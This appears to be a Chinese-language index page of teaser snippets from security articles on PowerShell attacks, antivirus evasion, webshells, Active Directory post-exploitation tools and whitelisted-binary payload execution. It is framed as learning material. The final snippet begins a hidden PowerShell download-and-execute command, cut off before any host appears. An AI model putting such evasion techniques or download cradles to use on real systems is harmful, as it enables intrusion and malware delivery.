前文分享了Windows基础,包括系统目录、服务、端口、注册表黑客常用的DOS命令及批处理powershell。这篇文章将详细讲解PowerShell和PowerSploit脚本攻击,进一步结合MSF...
红队攻防之powershell上线基础免杀(一)
不努力,你背井离乡干嘛?当卧底啊 环境为win10,在哥斯拉生成的webshell下,执行powershell命令。 测试杀毒软件为:火绒,腾讯电脑管家 哥斯拉生成php文件的webshell 如图 ...
加载 PowerShell 脚本
通过 Module, IEX, Metasploit, Cobalt Strike 方式加载 PowerShell 脚本 Module通过导入模块的方式加载 PowerShell 脚本. Import...
powershell分离免杀的几种简单方式
免责声明本公众号“猎洞时刻”旨在分享网络安全领域的相关知识,仅限于学习和研究之用。本公众号并不鼓励或支持任何非法活动。本公众号中提供的所有内容都是基于作者的经验和知识,并仅代表作者个人的观点和意见。这...
神器!Powershell版CrackMapExec
什么是PsMapExec PsMapExec是深受CrackMapExec启发而用Powershell编写的一个后渗透利用工具,可用于评估和测试Active Directory环境。 &...
干货!红队攻防之免杀总结
1、杀毒原理360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个杀毒软件领头羊,现在的杀毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用,最主要的还是扫描器的速度、准...
冠军Writeup大放送 | DataCon2022软件安全赛道之gogogo战队
由奇安信集团、清华大学网络研究院、蚂蚁集团、腾讯安全大数据实验室、Coremail论客主办的DataCon2022大数据安全分析竞赛线上赛和决赛已圆满落幕,五大赛道第一名也已各归其主。今天要为大家分享...
远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload
声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!声明:文中所涉及的技术、思路和工...
近源渗透测试之USBninja实战
No.1声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必...
绕过360进程防护执行Powershell
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良...
【转载】PowerShell去混淆总结
以下文章来源于ReverseHub ,作者lracker由于PowerShell作为一种非常有用的系统管理员脚本工具,在微软的Windows系统中广泛使用,并且大部分攻击者可以利用Power...
Bypass_AV - Powershell命令免杀
0x01 前言powershell.exe -nop -w hidden -c "IEX ((new-object net.web...